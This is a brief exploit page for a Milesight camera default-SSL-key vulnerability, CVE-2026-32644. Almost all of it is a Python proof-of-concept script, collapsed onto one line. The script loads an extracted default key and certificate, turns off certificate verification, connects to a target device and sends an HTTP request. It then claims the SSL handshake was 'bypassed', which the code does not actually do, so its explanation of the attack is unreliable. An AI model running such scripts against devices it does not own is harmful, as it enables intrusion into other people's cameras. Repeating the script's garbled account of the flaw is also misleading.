CVE-2026-32644 Milesight摄像头默认SSL私钥漏洞

import socket import ssl # PoC for CVE-2026-32644: Milesight Default SSL Key Usage # This script demonstrates connecting to a target device using a known default private key, # assuming the key has been extracted from the firmware. def exploit_default_ssl(target_ip, target_port, key_file, cert_file): print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Using default key: {key_file}") try: # Create a TCP socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) # Create an SSL context and load the default credentials context = ssl.create_default_context() # Load the default certificate and private key context.load_cert_chain(certfile=cert_file, keyfile=key_file) # Optionally disable verification if the target uses a self-signed cert (common in IoT) context.check_hostname = False context.verify_mode = ssl.CERT_NONE print("[*] Establishing SSL connection...") # Wrap the socket with SSL secure_sock = context.wrap_socket(sock, server_hostname=target_ip) secure_sock.connect((target_ip, target_port)) print("[+] Connection established successfully!") print("[+] SSL handshake bypassed using default credentials.") # Example interaction: Send a simple HTTP request payload = b"GET / HTTP/1.1\r\nHost: " + target_ip.encode() + b"\r\nConnection: close\r\n\r\n" secure_sock.send(payload) # Receive response response = secure_sock.recv(4096) print("[*] Response received:") print(response.decode(errors='ignore')) secure_sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP and path to extracted default key TARGET_IP = "192.168.1.100" TARGET_PORT = 443 DEFAULT_KEY = "milesight_default.key" DEFAULT_CERT = "milesight_default.crt" exploit_default_ssl(TARGET_IP, TARGET_PORT, DEFAULT_KEY, DEFAULT_CERT)